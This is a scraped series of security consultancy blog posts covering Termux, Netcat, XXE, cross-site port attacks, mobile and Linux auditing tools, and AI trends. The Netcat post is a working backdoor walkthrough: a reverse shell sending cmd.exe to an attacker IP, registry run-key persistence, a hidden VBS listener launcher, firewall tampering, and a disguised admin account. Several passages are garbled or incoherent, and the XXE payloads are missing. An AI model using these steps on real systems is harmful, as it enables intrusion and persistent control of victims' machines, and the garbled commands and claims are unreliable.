HOW YOUR EMPLOYEE’S SMARTPHONES ARE SERIOUS THREAT TO YOUR ORGANIZATION? Employee’s smartphones are a serious threat to the organization since it is allowed to use in the production environment. Android is the most popular mobile OS with more than 60% market share. As Android is ruling smartphone and tablet markets, developers are also creating more apps for Android devices. This is the reason why the Android market has millions of apps. Like websites, apps also need penetration testing to check for various vulnerabilities. Security testing for Android apps will need to have a penetration testing environment on your Android device. Almost all Useful Hacking Tools, Scripts can be used on Your Android Mobile. Termux is a Powerful app which can be used to install useful packages, Hacking Tools On your Android By installing this program, you can hack anything that comes to mind. From targeting websites, hacking computers, sniffing networks, brute forcing passwords, information gathering and many more. For more details about termux can be found in their official termux page. Link for the has given below https://wiki.termux.com/wiki/Main_Page Installation Google Play: https://play.google.com/store/apps/details?id=com.termux F-Droid: https://f-droid.org/packages/com.termux/ INSTALLING PACKAGES FROM THE REPOSITORY To install your favorite tool in termux you can run pkg install Example pkg install nmap To get list of available packages in termux, run pkg list-all To search a package pkg search nmap To show more info about a package pkg show nmap INSTALLING .DEB FILES Manual way of installing .deb files pkg install ./package.deb or dpkg -i ./package.deb Termux packages are built using Ubuntu 16.10, so this means that developers can compile any existing software from their machine and then add it to the package manager for anyone to download. It is a very simple and elegant solution to what otherwise could be a complex and difficult problem. One amazing side effect of this is that once the software is compiled, you have full-fledged versions of the software rather than half-baked, ported versions of desktop Linux packages. Termux gives you a bash terminal by default, but if you are like me and prefer Zsh for its advanced features, the FISH shell is also available. Multiple different shell types are certainly welcome. Anyone that has used a terminal emulator application on Android knows the pain when you need to enter special keys to control the terminal such as CTRL or ESC. These keys aren’t displayed on the standard touch keyboards used on android devices (save for Hacker Keyboard). Termux developer Fredrik Fornwall, though, has a very novel solution to this. He has bound CTRL to the Volume DOWN key and other special keys like ESC to the Volume UP key. Therefore, by pressing Volume Up + the touch keyboard ‘L’ you can input the terminal command CTRL + ‘L’ which clears the terminal window. The ESC key is sent by pressing volume UP + ‘E’ key for example. You can view all the keys available in Termux on the developer’s website FEATURES OF TERMUX API Secure. Access remote servers using the ssh client from OpenSSH. Termux combines standard packages with accurate terminal emulation in a beautiful open source solution. Feature packed. Take your pick between Bash, fish or Zsh and nano, Emacs or Vim. Grep through your SMS inbox. Access API endpoints with curl and use rsync to store backups of your contact list on a remote server. Customizable. Install what you want through the APT package management system known from Debian and Ubuntu GNU/Linux. Why not start with installing Git and syncing your dotfiles? Explorable. Have you ever sat on a bus and wondered exactly which arguments tar accepts? Packages available in Termux are the same as those on Mac and Linux – install man pages on your phone and read them in one session while experimenting with them in another. With batteries included. Can you imagine a more powerful yet elegant pocket calculator than a readline-powered Python console? Up-to-date versions of Perl, Python, Ruby, and Node.js are all available. Ready to scale up. Connect a Bluetooth keyboard and hook up your device to an external display if you need to – Termux supports keyboard shortcuts and has full mouse support. Tinkerable. Develop by compiling C files with Clang and build your own projects with CMake and pkg-config. Both GDB and storage are available if you get stuck and need to debug. term up has a list of command, all those can be found at link given https://github.com/termux/termux-packages/blob/master/packages/command-not-found/commands.h INSTALL SQLMAP Let’s do a practical session on how to install sqlmap on our android device. As we know that sqlmap is a most amazing website vulnerability scanning tool which is mostly used by pen testers, Hackers, Security Researchers and so on. Sqlmap is written in Python programming language environment, so that we need to have python installed in termux ,to install python in termux, run the command pkg install python2 once the installation is complete, we need to install git package because we are going to download sqlmap from the git repository to install git in termux run the command : pkg install git now its time to install our favorite tool sqlmap so run: git clone https://github.com/sqlmapproject/sqlmap.git the download process and the installation process will take some time, once it’s been done then navigate to the sqlmap directory using the following command cd then list the files using ls command now navigate to the sqlmap-dev folder using “cd sqlmap-dev” once you entered into the folder, list the files using ls command so you will see the executable file of sqlmap since sqlmap run under python, so we need to run using the following command python2 sqlmap.py bingo … now we have successfully installed sqlmap on our android device itself. Using the same method we can able install different tools on our android device. Termux: Hackers Perspective Before termux was originated, hackers were using so many application to perform different attacks. But now everything has come into single app, which is termux. Now this the time where hackers will take over every system easily. Hackers install Kali Linux on their android phone but it requires some time and patient, but this app looks alternative for the kali. So now hackers got the best handy tool. Hackers can able to get into your network and he/she can able to perform post exploitation techniques such as MITM, exploitation, etc. Mitigation from hackers attacks The users need to take necessary precautions in order to protect their devices, as the hackers can exploit any network using termux without the knowledge of the user. Patch anything and everything. Keep in mind that your secure environment from a month ago is now wide open thanks to Patch Tuesday The second Tuesday of each month when Microsoft releases security patches. Some months there are in excess of 30 patches released. That’s 30 potential vulnerabilities. Miss a month … 60 … two months … 120. Hackers are always finding new attack holes and methods into the system software. Patches and new versions of system software are frequently released to fix these newfound problems. Hackers are a close-knit community and they are more than willing to share your network’s flaws with their neighbors. Be prepared and Be secured!!! Author Venkatesh C>S Security Engineer BriskInfosec Technology and consulting PVT LTD Follow me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/
NETCAtNetcat is a computer network utility used for taking access, sending access, sending and receiving files over the internet using TCP and UDP connection. This tool is very famous for debugging the network and for investigation purpose. Netcat is also known as NC or swiss army knife. It is the most critical threat to network admins, programmers and penetration testers. NETCAT SETUP: Setting up netcat in windows is very simple. You download Netcat for windows from the given link https://joncraton.org/blog/46/netcat-for-windows/. Once you downloaded it extract the file in c directory. Then just open the command prompt and navigate to the netcat directory (yes I know we are lazy, shortcut to open a command prompt from the same directory, just got to the netcat directory hold shift and right click, and you will see an option “open command windows here” ) now run nc.exe. In Linux netcat is pre-installed. So we don’t need to worry about it. If you don’t find in Linux, open the terminal and type “apt-get install netcat”. This command will install netcat for you. In this blog is using Kali Linux as my attacker machine and victim machine as windows 7. PENETRATION TESTING WITH NETCAT Netcat is used for two primary modes of operation, one is as a client, and the other is a server. These two operations are hackers favourite, and penetration testers also use these operations. The primary usage of the two modes is connected to somewhere and listen for inbound connect to somewhere: nc [-options] host-name port [s] # this syntax is for netcat client mode listen for inbound : nc -l -p port [options] [host-name] [port] # this syntax is for netcat server mode the most commonly used options in netcat are -c shell commands as `-e'; use /bin/sh to exec [dangerous!!] -e filename program to exec after connect [dangerous!!] -l listen mode, for inbound connects -n numeric-only IP addresses, no DNS -p port local port number -u UDP mode -v verbose [use twice to be more verbose] -z zero-I/O mode [used for scanning] Netcat most potent options are -e prog. This option is used in server mode, which allows netcat to execute a command on the remote system. This option will enable netcat to run the specific program when clients connect to the server. Nc -l -p 1234 -e cmd.exe # windows nc -l -p 1234 -e bin/sh # Linux These are the basics of netcat. If you are still a beginner in netcat read this article for clear understanding http://scitechconnect.elsevier.com/wp-content/uploads/2013/09/Introduction-to-Netcat.pdf let’s get into real-time penetration testing with netcat let’s get a basic reverse shell from windows 7 nc -lvp 1234 # Kali Linux nc.exe 192.168.0.151 1234 -e cmd.exe # windows (IP mentioned is Kali IP address) when victim enters the command, ill get a reverse shell in Kali POST EXPLOITATION WITH NETCAT post exploitation is the crucial phase of penetration testing and fun part too.So here is some fun part that we can perform using netcat. Once we get a reverse shell from the victim system, we need to do some following steps . That’s is maintaining the connection. All the attackers face a big problem, which is session expiration. So here are some command s to make the session persistent. @echo offxcopy"%systemdrive%\%username%\Desktop\nc.exe""C:\Windows\System32" -y reg add "HKLM\soQware\microsoQ\windows\currentversion\run" /f /v"system" /t REG_SZ /d "C:\windows\system32\nc.exe-Ldp449 -ecmd.exe” netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow protocol=UDP localport=449 netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow program="C:\windows\system32\nc.exe " NOTE: this command should run as administrator RUNNING THE NETCAT IN BACKGROUND Here is the vb script to run netcat in the background, so that you don’t have to wait for the user to restart their computer. Dim objShellSet objShell = Wscript.CreateObject ("WScript.shell")objShell.run"C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe" SetobjShell = Nothing play with firewall netsh advfirewall set all profiles state off Turn off windows firewall will notify the user netsh advfirewall set allprofiles state on – Turns firewall on netsh advfirewall reset – Reset the firewall back to default netsh advfirewall set all profiles firewallpolicy blockinbound,allowoutbound – Block everything netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=block dir=IN – Open Port netsh advfirewall firewall delete rule name=" HTTP.” – Delete Rule schedule tasks we can also be able to mess with windows schedule task; we can able to create, delete and run a task. Creating Tasks – SCHTASKS /Create /S system /U user /P password /RU runasuser /RP runaspassword /SC HOURLY /TN rtest1 /TR notepad Delete Tasks – SCHTASKS /Delete /TN "Backup and Restore.” Running Tasks – SCHTASKS /Run /TN "StartBackup" now let’s create and add a local user and granting with administrator right net user /add briskinfosec Netcat /comment:"Approved through 3/07/2018 per CTO" / fullname:"brisk info sec" Netcat is used for scanning ports on the network. nc -v 192.168.0.170 - z 1-1000 # ip = target ip OUTPUT: root@7h3pr0xy:~# nc -v 192.168.0.170 -z 1-1000 192.168.0.170: inverse host lookup failed: Unknown host (UNKNOWN) [192.168.0.170] 554 (rtsp) open (UNKNOWN) [192.168.0.170] 445 (microsoft-ds) open (UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open (UNKNOWN) [192.168.0.170] 135 (loc-srv) open sometimes we need to randomise the port as well against the target to alert the IDS (intrusion detection system) or IPS (intrusion prevention system). nc -v -r 192.168.0.170 -z 1-1000 OUTPUT root@7h3pr0xy:~# nc -v -r 192.168.0.170 -z 1-1000 192.168.0.170: inverse host lookup failed: Unknown host (UNKNOWN) [192.168.0.170] 445 (microsoft-ds) open (UNKNOWN) [192.168.0.170] 135 (loc-srv) open (UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open (UNKNOWN) [192.168.0.170] 554 (rtsp) open While performing penetration testing less information will not help us to move forward. So we look for more details. In netcat, we have a verbose which give more info about the target. nc -vv -r 192.168.0.170 -z 130-140 OUTPUT: root@7h3pr0xy:~# nc -vv -r 192.168.0.170 -z 130-140 192.168.0.170: inverse host lookup failed: Unknown host (UNKNOWN) [192.168.0.170] 131 (?) : Connection refused (UNKNOWN) [192.168.0.170] 135 (loc-srv) open (UNKNOWN) [192.168.0.170] 130 (?) : Connection refused (UNKNOWN) [192.168.0.170] 134 (?) : Connection refused (UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open (UNKNOWN) [192.168.0.170] 133 (?) : Connection refused (UNKNOWN) [192.168.0.170] 140 (?) : Connection refused (UNKNOWN) [192.168.0.170] 132 (?) : Connection refused (UNKNOWN) [192.168.0.170] 137 (netbios-ns) : Connection refused (UNKNOWN) [192.168.0.170] 138 (netbios-dgm) : Connection refused (UNKNOWN) [192.168.0.170] 136 (?) : Connection refused sent 0, rcvd 0 Netcat can be used for the offensive purpose as well as defensive. If you are right programming, you can automate the executing process NOTE: use this swiss army knife in a useful way, so no one gets hurt with a sharp edge. Play safe and be safe AUTHOR Venkatesh C.S SecurityEngineer BriskInfoSec Technology and Consulting PVT LTD Find me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/
Welcome to the CISSP (ISC)2 Certification course landing page. For your convenience we offer the course in different formats. Click on the links below to get further information regarding each course schedule, price, format, and course outline. Boot Camp Course Evening Course On-Line Course (self-paced training) Boot Camp WebEx Course Evening…
DETECTION AND EXPLOITATION XML ENTITY INJECTION(XXE) INTRODUCTION XML External Entity Attack is a type of injection or input validation vulnerability which occurs in an application that allows any input parameter or data to be XML input or input which is combined into XML form data, and it is passed to an XML parser running with sufficient privileges to include external or system files. Recently, there has been an increase in the use of XML documents due to the growing use of the web services such as REST API and SOAP, which commonly use XML to process the data. XML has a feature to create entities dynamically; some of the objects are predefined, and they referenced by using an ampersand (&) and a semicolon (;) at the end. However, XML also allows us to create custom entities, the most popular being the internal and external entities. Internal entities can be used to reference internal data and external entities to reference data from external sources. EXAMPLE FOR INTERNAL ENTITY: ]> &name; Cyber Security Pentest In the first line, we have defined an entity “name” having a value “Brisk”; the block used to define the entities is known as the DTD block. Next, in the third line, you can see that we have referenced the entity “&name;”, which holds the value “Brisk.” In this way, we don’t have to input the name each time. All we have to do is use a reference to the entity. EXAMPLE FOR EXTERNAL ENTITY: ]> &name; Data pentest In the first line, in the DTD block, we have defined an external entity, which contains a link to an external resource. When this XML document is processed, it would request an external source and would replace values of all instances of “&name;” with the content of the external resource. If the content of the external resource is processed and displayed back to the user without proper validation, an attacker may be able to abuse the parser in conducting an XXE injection attack. To find any XXE (XML External Entity) vulnerability, attacker or tester needs to inject XML characters in all input fields and observe if XML parsing errors are generated. EXPLOITATION OF XXE VULNERABILITY: Use information disclosed in error messages to determine at what file path the XML parser is parsing. Cause errors to occur using malformed XML. Let us consider a test website (here I’m using OWASP Mutillidae application) 1. In below image, the application has an XML parser input page, 2. Let’s try giving some XML inputs and check the response from the server. 3. After that, we can try to inject XML inputs with multiple user-defined entities 4. Now we can try to include external data using section of XML input. The section of an XML document optionally defines external files to be included as part of the XML document. Interestingly these can even be files from the system parsing the XML. We can use the section of XML input, we can try to access local files like /etc/ passwd files of a Linux server. 5. Once we have given the above XML payload, we can get the password files details from back-end Linux server. 6. Similarly, we can try to load the boot.ini files if the server is windows operating system, using an XML payload like below ]> &systemEntity; MITIGATIONS FOR XXE INJECTION ATTACKS: 1. XML parser functions like unmarshaller should have a secure configuration to prevent allowing external entities as part of an incoming XML document input. 2.XML inputs should not be processed directly as java.io.File, java.io.inputstream. References: https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing https://stackoverflow.com/questions/40649152/how-to-prevent-xxe-attack Dawood Ansar Security Engineer BriskInfosec Technology and consulting PVT LTD Find me @https://www.linkedin.com/in/dawood-ansar-29403213b/
CROSS SITE PORT ATTACK (XSPA) INTRODUCTION: A web application is helpless against Cross Site Port Attack if it forms client provided URLs and does not disinfect the backend reaction got from remote servers previously sending it back to the client. The responses, in specific cases, can be concentrated to distinguish benefit accessibility (port status, flags and so forth.) and even bring information from remote administrations in unique ways. Detecting a potential XSPA vulnerability is very simple and if the web app takes URL as input and tries to make it connect to the port and analyse the output and I have been attempting this XSPA attack on a testing app http://testphp.vulnweb.com/ Once I visited the testing site, and here I have selected the image categories option on the site as follows Later I have selected the required image file it takes me to the URL as follow Once I Visited this site I have started to capture the backend response using Burp Suite tool Burp Suite is a graphical tool for testing Web application security, and It was mainly developed to provide a comprehensive solution for web application security checks. and In addition to this basic functionality, it also has some extra features such as proxy server, scanner and intruder, the tool also contains more advanced options such as a spider, a repeater, a decoder, a comparer, an extender and a sequencer I have cross checked this site using my localhost with some ports and captured the response in burp suite, and by this method, we can precisely analyse the response for each port Here I have captured the response of the image URL and crossed check it with my localhost with port 80(HTTP), and I can see the response 200 OK (Normal response) Once It fetches the average result, and you can also confirm this for other ports like 22(ssh), 21(ftp), 25(SMTP), 8080(https) etc. and you can check the result in browser as well. During Port analysis, if any required port is closed, it fetches the result as It also shows the response of 200, but it displays some warning like (failed to open) or connection refused etc. and if it shows this case of errors then you can confirm that the port is closed In the above screenshot shows the different case of the port is opened but it shows the result without exposing the attacker IP on the server logs and it also reveals the backend service running on SSH MITIGATION FOR XSPA ATTACK: Unauthorized URL’s access should be restricted Restrict Connectivity to the internal ports Whitelist IP address Disable Unwanted protocols and services. You can block your ports using firewall for better security please check the link below to block your inernal ports Reference Link: http://www.thewindowsclub.com/block-open-port-windows-8-firewall CONCLUSION: XSPA vulnerability attack mainly used to perform port scanning of a target using another vulnerable website and also an attacker can perform a DOS attack, Code Execution and other major attacks on other vulnerable websites Reference Link: https://teamultimate.in/cross-site-port-attack-xspa-tutorial/ http://indiatriks.blogspot.in/2012/07/xspa-cross-site-port-attack.html AUTHOR RamKumar G SecurityEngineer BriskInfoSec Technology and Consulting PVT LTD Find me @ https://www.linkedin.com/in/ram-kumar-3439b511a/
YSO – OPENSOURCE MOBILE SECURITY FRAMEWORK YSO is the Mobile Security Framework and they are capable of performing Static and Dynamic analysis on mobile Applications and Its supports only APK (Android) and IPA (IOS) files and they are various tools used to decompile, debug and code review in mobile app testing and it consumes lot of time and by this framework we can able to check over various mobile issues like Insecure Data Storage Insecure Communication Insecure Authentication Certificate Pinning Backup Data’s Enabled etc. The above issues are the major mobile issues that are occurred in a common way In Static Analysis it used to detect automated Code review, insecure Permissions, Configuration issues, and it also detects over insecure code like SSL overriding, SSL bypass, weak crypto, obfuscated codes, improper permissions, hard coded secrets, improper usage of dangerous APIs, and leakage of sensitive/PII information. In Dynamic Analysis is slightly difficult to configure it mainly runs on the VM or on a configured devices and detects the issues at run time and Further analysis is done on the captured network packets, decrypted HTTP traffic, dumps, logs, etc. This tool is highly scalable by which you can add your custom rules in easy use and you can use this framework results as a source to detect the mobile application issues manually and finally the overall report gets saved on the required folder that you are selected. Requirements: Python 2.7 Django 1.8 Oracle JDK 1.7 or above http://www.oracle.com/technetwork/java/javase/downloads/ Notes: On Linux and Mac, install Oracle Java and make it the default one. iOS IPA Binary Analysis requires MAC OSX and you need to install Command line tools for MAC OSX http://osxdaily.com/2014/02/12/install-command-line-tools-mac-os-x/ STATIC ANALYSIS APK RESULTS: CERTIFICATE ISSUE: Static Analysis in IOS result: CONFIGURING STATIC ANALYZER: Tested on Windows 7, 8, 8.1, Ubuntu, OSX Marvicks Install Django version 1.8 Pip install Django==1.8 Here I have installed Django in Linux Django is one of the Web application Framework that used to make the process easier because it has some automated tools in-build so it executes the result at short interval of time YSO Framework Configuration in Linux: I have configured the YSO Framework and configured the server and Configuration Link: http://127.0.0.1:8000/ Once you have entered this URL in your browser U’ll get a Page as follows YSO EXECUTION ON BROWSER: Here In this Framework you can upload a particular APK file OR IPA File that you are going to test and it executes the result as in the above figure CONCLUSION: From this Blog we have discussed above the installation, Configuration and working Method of YOS Mobile application Framework and we also discussed the results executed for a particular APK or IPA files. YSO Mobile Security Framework is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis. We’ve been depending on multiple tools to carry out reversing, decoding, debugging, code review, and pen-test and this process requires a lot of effort and time. YSO Mobile Security Framework can be used for effective and fast security analysis of Android and iOS Applications. BiskInfosec provides the best mobile Security solutions. For further doubts and security solution advices reach us @ [email protected] AUTHOR RamKumar Security Engineer BriskInfosec Technolagy And consulting PVT LTD follow me @https://www.linkedin.com/in/ram-kumar-3439b511a/
LYNIS- OPEN-SOURCE LINUX SYSTEM AUDITING TOOL Lynis is a system based auditing and open source tool. It supports with the auditing systems which is running UNIX-systems and providing controls for system hardening and comliance based testing. By running ‘lynis’ the program is begun and will give the essential parameters accessible. If you are using it for first time Lynis (or utilized Git), at that point utilize “./lynis” to begin the program from the local directory. The most common command to begin Lynis is utilizing review framework order. This still begin the security scan. To run Lynis you should meet one essential: have compose access to/tmp (temporary documents). INSTALLATION VIA PACKAGE Installing Lynis via a package manager is one option to get started with Lynis. For most operating systems and distributions, a port or package is available. First add our software repository. This way the latest version will be available to your system. RED HAT This applies to systems running YUM, including CentOS, Fedora, Red Hat Enterprise Linux (RHEL). $ yum install lynis DEBIAN Systems running Debian, Linux Mint, Ubuntu, or are based on one of these. $ apt-get install lynis OPENSUSE $ zypper install lynis After the installation, it is time to run Lynis for the first time. INSTALLATION VIA GIT Clone project The first step is cloning the project. Before doing so, select the parent directory. Git will create a ‘lynis’ subdirectory with the full program in it. $ cd /Desktop $ git clone https://github.com/CISOfy/lynis Cloning into ‘lynis’… remote: Counting objects: 1733, done. remote: Compressing objects: 100% (8/8), done. remote: Total 1733 (delta 3), reused 0 (delta 0), pack-reused 1725 Receiving objects: 100% (1733/1733), 886.18 KiB | 378.00 KiB/s, done. Resolving deltas: 100% (1204/1204), done. Checking connectivity... done. $ cd lynis That is it. Time to run your first security audit: $ lynis audit system Although no configuration is required, there are a few useful commands to learn. LYNIS COMMANDS The Lynis tool requires a minimum amount of parameters to run. If you are using it for the first time, just run lynis and see what output it provides. ./lynis AUDIT The audit command tells Lynis to perform an audit. Targets include: system - audit the host system docker file - audit a docker file SHOW The show command informs Lynis to share information, like help or the value of something. Options: help – show help and tips profiles – show discovered audit profiles settings – show active settings version – show Lynis version Here you can see the commands which are all given in the Lynis auditing tool,There are more options which are given below, some of them are layout options, misc options and Enterprise options too. Lynis scans the system and performs the tests, results should be displayed on the screen. The log files should be displayed on the screen during the system scan. To check that log database to saved here var/log/lynis.log. The log file should store once the backup before the process of running Lynis again and again. During the audit process, Lynis will gather some findings and data points should use where we can find that storage process using varlog/lynis-report.dat.Benefits: Perform audits within a few minutes System hardening can be done Central management Powerful reporting Compliance checks (e.g. PCI DSS) Additional plugins and more tests Comparison between Lynis and other tools: Hardening process are easily exposed when compared to other auditing tools such as Bastille, TOD (Touch of Death). It conserves time when compared to other auditing tools. It helps to track your compliance needs, IT audits, better security defences. Operating system Finding: It detects the operating system name, operating system version, host name and hardware platform for the Lynis tool. Lynis runs almost all UNIX-based systems and versions including, AIX FreeBSD Linux macOS, Solaris etc… It even runs on the storage devices like Raspberry Pi, or QNAP System Tools:It find out the Binaries, scanning the tools which are all currently updated or not and used some plugins also in this system tools. Boot configuration:In this boot configuration level issues to be find whether the password is encrypted, booting method like legacy boot or UEFI boot method, Grub checking possibilities, and how many services are running in the system, to check the start-up files also. Conclusion: Security need to be reliable. Lynis can remind us to stay consistent. Lynis will scan your system and warn you for any security holes. This blogs gives an idea about Lynis server hardening tool to harden server and also discussed about where the exact location of hardening. BriskInfosec offers end to end server hardening solutions where ever the industry requires to know more get in touch with us. AUTHOR Aravind Security Engineer BriskInfosec Technology and consulting PVT LTD Find me @https://www.linkedin.com/in/aravindhan-s-90b98787/
TOP ARTIFICIAL INTELLIGENCE TRENDS IN CYBER SECURITY Artificial intelligent is defined as the study of intelligent agent and devices that perceives the environment around and takes some actions for its chance of success at some goals and it also plays an important role in all fields AI robots are one of the major invention in recent years it takes the actions, control and activities of human environment and replicates the same and AI can encompass anything from google search algorithm In Today’s Artificial Intelligence made to perform a narrow task it’s meant to drive a car by its own but when compared to narrow AI Many researches plan to create a general (AGI or strong AI) because the narrow AI can perform each and every task of the human and it may also lead to some dangerous activities it plays a major drawback on creating a narrow AI ADVANTAGES OF ARTIFICIAL INTELLIGENCE: Artificial Intelligence is used in a complicate mixture of computer science, Mathematics and other complex sciences major advantage of artificial intelligence as follows Error Reduction Difficult Exploration Daily Application Digital Assistance Repetitive jobs Medical Application No Break ERROR REDUCTION: It is mainly used to detect and minimize the errors and also executes the result at higher accuracy and AI helps us to study about the concept involved in the exploration of space and AI created robots are used to transfer information across the space and robots transfers the information’s to the space are highly secured and they cannot be modified or copied by a normal human DIFFICULT EXPLORATION: It involves the science of robots, process of mining and other fuel exploration purposes and it acts not only in the complex behavior but also in the exploration of space due to its programming ability it can performs the process more than human’s behavior In Mining AI places an important role to detect the exact place for digging to find out the non-artificial products like the coal, gold, silver and research made by the Goldcorp team up with the IBM Watson to develop an advanced feature by AI to find out the Non Artificial product locations Reference Link: https://www.techemergence.com/ai-in-mining-mineral-exploration-autonomous-drills/ DAILY APPLICATION: Computed Methods for Automated testing, Learning, reasoning and our other daily activities lies under AI. Cortana and Siri are used as a Virtual Search engine to help us out, tracking software like Map and cab booking are worked under GPS. Smartphone are on the perfect example for artificial intelligence, security chips placed in the ATM card follows AI to secure themselves from fraud DIGITAL ASSISTANCE: Highly advanced Organization used ‘avatar’ to minimize the work of humans and interacts with the clients and performs the task based on their requirements and many peoples started to use the robots in hotel for serving purpose and google lens is an another advanced method to connect with internet without the authentication process REPETITIVE JOBS: Repetitive jobs are monotonous in nature and it can be used in the purpose of machine intelligence and the machine thinks faster than humans in our life Machine Intelligence can assigned to perform some dangerous tasks because we can set some parameters for robots to perform their action it process the working methods in a secured manner and executes a better results than humans, Play Station is one of the best example when we are playing the one component is user and the another component is the AI and it capture the movement of the user and displays the same actions on the screen MEDICAL APPLICATION: In Medical field Doctor’s assess the patient and their health risk by the method of artificial intelligence and it guides the patient to be aware from medicine side effects, it finds a huge application in detecting and finding the neurological disorders and it capture the actions performed by the brain and nowadays in medical application it’s been developed to the digital body scanning (to scan over your whole body) in an automated manner. Reference Link: https://www.youtube.com/watch?v=DCtAxUB1bvI NO BREAK: Machines unlike humans do not requires frequents break and refreshments they are performed for long hours and can continuously perform without getting bored or distracted or even tired DISADVANTAGES OF ARTIFICIAL INTELLIGENCE High Cost No Replicating humans No improvement with experience Unemployment HIGH COST: Creation of the Artificial Intelligence machines or robots charges high cost when compared to the other automated machines and the repair and maintenance require high cost and AI also needs some upgrades to develop its level day by day and when the AI machine gets breakdown or any maintenance report leads to high cost to recover the codes (or) to repair the machine so it considered to be the major drawback of Artificial Intelligence NO REPLICATING HUMANS: Machine do not have emotions it leads to the drawback of AI because at certain situations they do not know to take the correct decisions at a specific time. The either perform incorrectly or breakdown in such situations NO IMPROVEMENT WITH EXPERIENCE: Unlike humans artificial intelligence cannot be calculates its experience based on its time they are different from humans and AI stores lots of data but it fails to access at time when it is needed and it does not any care or emotional feeling like human and it’s one of the drawback of AI from humans, they fail to distinguish between the hardworking individual and inefficient individual UNEMPLOYMENT: Replace of humans with machines lead to the large scale of unemployment and Unemployment is one of the most socially undesirable phenomenon and Humans are becoming lazy nowadays and they started to use machine to complete their work and this lead to the unemployment of many peoples and if humans starts thinking in a destructive way it leads to the create havoc with this machine, when artificial intelligence takes plays in a destructive way it leads to any kind of massive destructions in the world ROLE OF AI IN CYBER SECURITY: Machine Learning and artificial Intelligence plays an important role across industries and applications that has been used for computing power, data collections and analyzing against vulnerabilities etc. By using AI we can perform any kinds of exploits and it detects the vulnerabilities in an easier and automated way in many cyber security organization’s employees were started to Learn AI and Machine Learning to develop their standards to next level in Artificial Intelligence TOP TRENDS IN CYBER SECURITY: GDPR (GENERAL DATA PROTECTION REGULATION): It’s mainly prepared for the European Union’s, of how to store your personal Data in a secured manner and it also mainly created for the EU Citizens because they are not complete with it and many Organization are expected to start GDPR for May. AI AND MACHINE LEARNING ON CYBER DEFENSE: AI and Machine learning plays an important role in cyber defense and machine learning modules detects the exact moves of the cyber security criminals and it helps the InfoSec professional’s in a greater way HANDLING DATA BREACHES: It’s impossible to eradicate data breaches completely and many organization’s started to control data breaches with some condition’s through monitoring IOT Devices to get control from DDOS attacks or misdirecting potential victim’s and failing to patch a known vulnerabilities and we can hope that the data’s could be entirely controlled in the upcoming years DEVELOPING A COMMON LANGUAGE: There is a positive growth of development in cybersecurity realm and not least the creation and adoption of thing’s like NIST Cybersecurity framework and more cybersecurity experts and organization’s planning to develop a common language in the field of cybersecurity to make the process easier. APPLICATION TESTING: Application testing leads to the large amount of the data breaches because the security testing in application’s are not properly maintained and to control these everyone should put a fresh efforts into patching and app testing in the coming year, and by this we would see a dramatic drop in data breaches. ARTIFICIAL INTELLIGENCE TOOLS: Google Now Intelligent Personal Assistants Crystal knows Textio Enlitic Digital Genius TAMR Intraspexion Recorded Future Conversica COMPANIES TRIES TO IMPROVE AI IN CYBER SECURITY: AI FOCUS ON MALWARE: AI Mainly focus on malware rather than exploits it checks for every suspicious file within the folder or checks by CPU instructions and or by API imports and AI can detect the malware by certain limitations in Memory or by I/O Operations and AI focus starts from the exploitation if any malware is sent to the computer it starts from the exploitation and later it can be passed through malicious shellcode can be passed through browser or by Microsoft office (or) Adobe Reader and finally in Malware AI Detection AI detects the malware by checking its memory level and by I/O operations Once they are not up to its level they are considered to be the malicious one. After Malware detection AI can also be bypassed using AI Evasion techniques and by this process it redirects its way by detecting against AV and bypasses the malware detection on AI and here by using this techniques the AI fails to detects the malware and they are been explained as follows. But Still Now AI Fails to detect the Zero Day Attacks and they are many methods are been developed on AI to detect advanced threats and Zero Day but it fails but the development on detecting Advanced level threats are going on in Progress SUB INDUSTRY ARTIFICIAL INTELLIGENCE: Artificial Intelligence statistics across every industries is been described in the above figure BOOKS ON ARTIFICIAL INTELLIGENCE: Reference Link: http://bigdata-madesimple.com/20-free-books-to-get-started-with-artificial-intelligence/ CONCLUSION: As cyberattacks become more sophisticated, cybersecurity teams are tasked with adapting their technology to find new anomaliesOrganizations face millions of threats each day making is impossible for a security researcher to analyze and categorize them. This task can be done by using Machine Learning in an efficient way. However, a more efficient cybersecurity process can help reduce costs and help streamline the process. Artificial intelligence and machine learning can rapidly and efficiently detect threats, resolve them, and prevent them in the shortest amount of time possible with the greatest potential for resolution. AUTHOR RamKumar Security Engineer BriskInfosec Technology and Consulting PVT LTD Follow me @ https://www.linkedin.com/in/ram-kumar-3439b511a/